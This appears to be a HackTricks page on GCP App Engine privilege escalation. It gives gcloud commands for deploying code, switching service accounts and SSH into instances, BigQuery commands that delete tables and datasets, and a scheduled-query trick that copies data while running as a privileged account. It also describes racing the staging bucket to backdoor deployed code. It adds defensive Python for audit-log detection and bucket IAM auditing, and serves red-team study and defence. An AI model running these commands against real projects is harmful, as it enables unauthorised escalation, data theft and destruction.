GCP - AppEngine Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## App Engine
For more information about App Engine check:
### appengine.applications.get, appengine.instances.get, appengine.instances.list, appengine.operations.get, appengine.operations.list, appengine.services.get, appengine.services.list, appengine.versions.create, appengine.versions.get, appengine.versions.list, cloudbuild.builds.get, iam.serviceAccounts.actAs, resourcemanager.projects.get, storage.objects.create, storage.objects.list
These are the permissions needed to deploy an App using the gcloud cli. The get and list ones might not be required.
You can find python code examples in https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine
By default, the name of the App service will be default, and there can only be 1 instance with that name.
To change it and create a second App, in app.yaml change the value of the root key to something like service: my-second-app
```bash
cd python-docs-samples/appengine/flexible/hello_world
gcloud app deploy #Upload and start application inside the folder
```
Give it at least 10–15 minutes; if it doesn't work, run the deploy a couple more times and wait a few minutes.
Note
It's possible to specify the Service Account to use, but by default the App Engine default SA is used.
The URL of the application is something like https://<proj-name>.oa.r.appspot.com/ or https://<service_name>-dot-<proj-name>.oa.r.appspot.com
#### Update with the same permissions
You might have enough permissions to update an App Engine but not to create a new one. In that case, this is how you can update an existing App Engine:
```bash
# Find the code of the App Engine in the buckets
gsutil ls

# Download code
mkdir /tmp/appengine2
cd /tmp/appengine2
## In this case it was found in this custom bucket but you could also use the
## buckets generated when the App Engine is created
gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip .
unzip labs_appengine_1_premissions_privesc.zip

## Now modify the code..

## If you don't have an app.yaml, create one like:
## (env_variables entries must be indented under the key for the YAML to parse)
cat >> app.yaml <<EOF
runtime: python312
entrypoint: gunicorn -b :\$PORT main:app

env_variables:
  A_VARIABLE: "value"
EOF

# Deploy the changes
gcloud app deploy

# Update the SA if you need it (and if you have actas permissions)
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
If you have already compromised an App Engine and you have the permission appengine.applications.update and actAs over the service account to use, you can modify the service account used by App Engine with:
```bash
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
With these permissions it's possible to ssh into App Engine instances of type flexible (not standard). Some of the list and get permissions might not really be needed.
```bash
gcloud app instances ssh --service <app-name> --version <version-id> <ID>
```
### appengine.applications.update, appengine.operations.get
I think this just changes the background SA google will use to set up the applications, so I don't think you can abuse this to steal the service account.
```bash
gcloud app update --service-account=<sa_email>
```
### appengine.versions.getFileContents, appengine.versions.update
I'm not sure how to use these permissions or whether they are useful (note that when you change the code a new version is created, so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to somehow, maybe by changing the code inside the bucket??).
### bigquery.tables.delete, bigquery.datasets.delete & bigquery.models.delete (bigquery.models.getMetadata)
To remove tables, datasets or models:
```bash
# Table removal
bq rm -f -t <PROJECT_ID>.<DATASET>.<TABLE_NAME>

# Dataset removal
bq rm -r -f <PROJECT_ID>:<DATASET>

# Model removal
bq rm -m <PROJECT_ID>:<DATASET_NAME>.<MODEL_NAME>
```
### Abusing Scheduled Queries
With the permissions bigquery.datasets.get, bigquery.jobs.create and iam.serviceAccounts.actAs, an identity can query dataset metadata, create BigQuery jobs, and run them using a Service Account with higher privileges.
This attack allows abusing Scheduled Queries to run queries automatically (executed under the chosen Service Account), which, for example, can cause sensitive data to be read and written into another table or dataset the attacker can access, enabling indirect and persistent exfiltration without having to move the data outside the project.
Once the attacker knows which Service Account has the permissions required to run the desired query, they can create a Scheduled Query configuration that runs as that Service Account and periodically writes the results into a dataset of their choice.
```bash
bq mk \
--transfer_config \
--project_id=<PROJECT_ID> \
--location=US \
--data_source=scheduled_query \
--target_dataset=<DEST_DATASET> \
--display_name="Generic Scheduled Query" \
--service_account_name="<SERVICE_ACCOUNT>@<PROJECT_ID>.iam.gserviceaccount.com" \
--schedule="every 10 minutes" \
--params='{
  "query": "SELECT * FROM `<PROJECT_ID>.<SOURCE_DATASET>.<source_table>`;",
  "destination_table_name_template": "<destination_table>",
  "write_disposition": "WRITE_TRUNCATE"
}'
```
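From the defender's side, every action on this page so far (deploying a version, pointing the application at another service account, enabling SSH on a flexible instance, and creating a scheduled query that runs as a privileged service account) lands in Cloud Audit Logs. The following is an added example, not code from HackTricks, that scans audit-log entries in the `protoPayload` layout Cloud Logging exports and raises findings for those actions, with a higher severity when the service account involved is not on an allow-list. The `methodName` values it watches, the request field paths it reads, and the sample entries are assumptions constructed for the example and should be confirmed against a real project's logs in Logs Explorer.

```python
"""Detect App Engine deployment/service-account changes and scheduled-query
creation from Cloud Audit Log entries. Added example (not HackTricks' code):
method names, request paths and the sample entries below are assumptions."""

# Assumed audit-log method names for the actions this page covers.
WATCHED_METHODS = {
    "google.appengine.v1.Versions.CreateVersion": "new App Engine version deployed",
    "google.appengine.v1.Applications.UpdateApplication": "App Engine application settings changed",
    "google.appengine.v1.Instances.DebugInstance": "debug/SSH enabled on a flexible instance",
    "google.cloud.bigquery.datatransfer.v1.DataTransferService.CreateTransferConfig": "scheduled query created",
}


def _get(d, path, default=None):
    """Walk a dotted path through nested dicts; return default when any key is missing."""
    cur = d
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def analyze_entries(entries, trusted_service_accounts, trusted_principals=()):
    """Return findings for entries whose methodName is watched.

    Principals in trusted_principals (e.g. the CI deployer) are skipped so routine
    deploys do not alert; a finding is 'high' when the request names a service
    account outside trusted_service_accounts, otherwise 'medium'.
    """
    findings = []
    for entry in entries:
        payload = entry.get("protoPayload", {})
        method = payload.get("methodName", "")
        if method not in WATCHED_METHODS:
            continue
        principal = _get(payload, "authenticationInfo.principalEmail", "unknown")
        if principal in trusted_principals:
            continue
        reason = WATCHED_METHODS[method]
        service_account = None
        if method.endswith("UpdateApplication"):
            service_account = _get(payload, "request.application.serviceAccount")
            if service_account is None:
                continue  # update did not touch the SA: not the signal we care about
            reason = f"App Engine service account changed to {service_account}"
        elif method.endswith("CreateVersion"):
            service_account = _get(payload, "request.version.serviceAccount")
        elif method.endswith("CreateTransferConfig"):
            service_account = _get(payload, "request.serviceAccountName")
            query = _get(payload, "request.transferConfig.params.query", "")
            reason = f"scheduled query created: {query[:80]}"
        severity = "high" if service_account and service_account not in trusted_service_accounts else "medium"
        findings.append({
            "principal": principal,
            "method": method,
            "service_account": service_account,
            "severity": severity,
            "reason": reason,
            "resource": payload.get("resourceName", ""),
        })
    return findings


# Constructed sample entries (not real logs), trimmed to the fields used above.
SAMPLE_ENTRIES = [
    {"protoPayload": {"methodName": "google.appengine.v1.Versions.CreateVersion",
                      "authenticationInfo": {"principalEmail": "ci-deployer@my-project.iam.gserviceaccount.com"},
                      "resourceName": "apps/my-project/services/default/versions/20240101t000000",
                      "request": {"version": {"serviceAccount": "my-project@appspot.gserviceaccount.com"}}}},
    {"protoPayload": {"methodName": "google.appengine.v1.Applications.UpdateApplication",
                      "authenticationInfo": {"principalEmail": "dev@example.com"},
                      "resourceName": "apps/my-project",
                      "request": {"application": {"serviceAccount": "admin-sa@my-project.iam.gserviceaccount.com"}}}},
    {"protoPayload": {"methodName": "google.appengine.v1.Applications.UpdateApplication",
                      "authenticationInfo": {"principalEmail": "dev@example.com"},
                      "resourceName": "apps/my-project",
                      "request": {"application": {"servingStatus": "SERVING"}}}},
    {"protoPayload": {"methodName": "google.cloud.bigquery.datatransfer.v1.DataTransferService.CreateTransferConfig",
                      "authenticationInfo": {"principalEmail": "dev@example.com"},
                      "resourceName": "projects/my-project/locations/us",
                      "request": {"serviceAccountName": "bq-admin@my-project.iam.gserviceaccount.com",
                                  "transferConfig": {"dataSourceId": "scheduled_query",
                                                     "params": {"query": "SELECT * FROM `my-project.hr.salaries`"}}}}},
    {"protoPayload": {"methodName": "google.appengine.v1.Instances.DebugInstance",
                      "authenticationInfo": {"principalEmail": "dev@example.com"},
                      "resourceName": "apps/my-project/services/default/versions/v1/instances/abc"}},
    {"protoPayload": {"methodName": "google.appengine.v1.Services.GetService",
                      "authenticationInfo": {"principalEmail": "dev@example.com"}}},
]
TRUSTED_SERVICE_ACCOUNTS = {"my-project@appspot.gserviceaccount.com"}
TRUSTED_PRINCIPALS = {"ci-deployer@my-project.iam.gserviceaccount.com"}


def run_sample():
    return analyze_entries(SAMPLE_ENTRIES, TRUSTED_SERVICE_ACCOUNTS, TRUSTED_PRINCIPALS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f['severity']}] {f['principal']}: {f['reason']} ({f['resource']})")
```

On the sample data the CI deployer's routine deploy is suppressed and the plain `servingStatus` update is ignored, leaving three findings: the service-account switch and the scheduled query (both high, since they name service accounts outside the allow-list) and the debug/SSH enablement (medium). In practice the same rules map directly onto a Cloud Logging sink or log-based alert on those `methodName` values.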
## Write access to buckets
As explained, appengine versions generate some data inside a bucket with the name format: staging.<project-id>.appspot.com. Note that it's not possible to pre-takeover this bucket because GCP users are not allowed to create buckets using the domain appspot.com.
However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and, whenever a change is performed, modifying the code as fast as possible. This way, the container created from this code will execute the backdoored code.
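The race described above only exists if someone besides the expected deployers can write to the staging bucket, so the practical mitigation is to audit the bucket's IAM policy. The following is an added example, not code from HackTricks, that takes the JSON policy returned by `gcloud storage buckets get-iam-policy <bucket>` or `gsutil iam get` (a `bindings` list of `role`/`members`) and flags members that hold an object-writing role but are not on an allow-list, as well as any public (`allUsers`/`allAuthenticatedUsers`) grant, since public read already exposes the staged source. The set of write roles, the allow-list and the sample policy are assumptions constructed for the example.

```python
"""Audit the IAM policy of an App Engine staging bucket for unexpected write
access or public exposure. Added example (not HackTricks' code); the role set,
allow-list and sample policy below are assumptions."""

# Predefined Storage roles that permit creating or overwriting objects (assumed complete enough
# for a first pass; custom roles carrying storage.objects.create are not covered here).
WRITE_ROLES = {
    "roles/storage.admin",
    "roles/storage.objectAdmin",
    "roles/storage.objectCreator",
    "roles/storage.objectUser",
    "roles/storage.legacyBucketOwner",
    "roles/storage.legacyBucketWriter",
    "roles/storage.legacyObjectOwner",
}
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def staging_bucket_name(project_id):
    """Name of the bucket App Engine stages source in, per the pattern given on this page."""
    return f"staging.{project_id}.appspot.com"


def audit_bucket_policy(policy, allowed_writers):
    """Return findings for public grants and for writers outside allowed_writers.

    policy follows the get-iam-policy JSON shape: {"bindings": [{"role": ..., "members": [...]}]}.
    A conditional binding is still reported, with the condition title attached,
    because the condition may not restrict the object-creating case.
    """
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        condition = binding.get("condition")
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                findings.append({"member": member, "role": role, "issue": "public access to staged source"})
            elif role in WRITE_ROLES and member not in allowed_writers:
                issue = "unexpected write access to staged source"
                if condition:
                    issue += f" (conditional: {condition.get('title', '')})"
                findings.append({"member": member, "role": role, "issue": issue})
    return findings


# Constructed sample policy for the project "my-project" (not a real bucket policy).
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/storage.legacyBucketOwner",
         "members": ["projectOwner:my-project", "projectEditor:my-project"]},
        {"role": "roles/storage.legacyBucketReader",
         "members": ["projectViewer:my-project"]},
        {"role": "roles/storage.objectAdmin",
         "members": ["serviceAccount:ci-deployer@my-project.iam.gserviceaccount.com",
                     "user:intern@example.com"]},
        {"role": "roles/storage.objectViewer",
         "members": ["allAuthenticatedUsers"]},
    ]
}
ALLOWED_WRITERS = {
    "projectOwner:my-project",
    "projectEditor:my-project",
    "serviceAccount:ci-deployer@my-project.iam.gserviceaccount.com",
}


def run_sample():
    return audit_bucket_policy(SAMPLE_POLICY, ALLOWED_WRITERS)


if __name__ == "__main__":
    print("bucket:", staging_bucket_name("my-project"))
    for f in run_sample():
        print(f"{f['issue']}: {f['member']} via {f['role']}")
```

Run against a real policy by loading the JSON from `gcloud storage buckets get-iam-policy gs://staging.<project-id>.appspot.com --format=json` and passing the principals your deployment pipeline legitimately uses as `allowed_writers`. On the sample policy it reports the intern's `objectAdmin` grant and the `allAuthenticatedUsers` viewer grant; project owners/editors and the CI deployer are accepted.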
For more details and a PoC check the relevant information from this page:
## Write access to Artifact Registry
Although App Engine builds docker images inside Artifact Registry, it was tested that even if you modify the image in this service and delete the App Engine instance (so a new one is deployed), the code that is executed doesn't change.
It's possible that by performing a Race Condition attack, as with the buckets, it might be possible to overwrite the code that is executed, but this wasn't tested.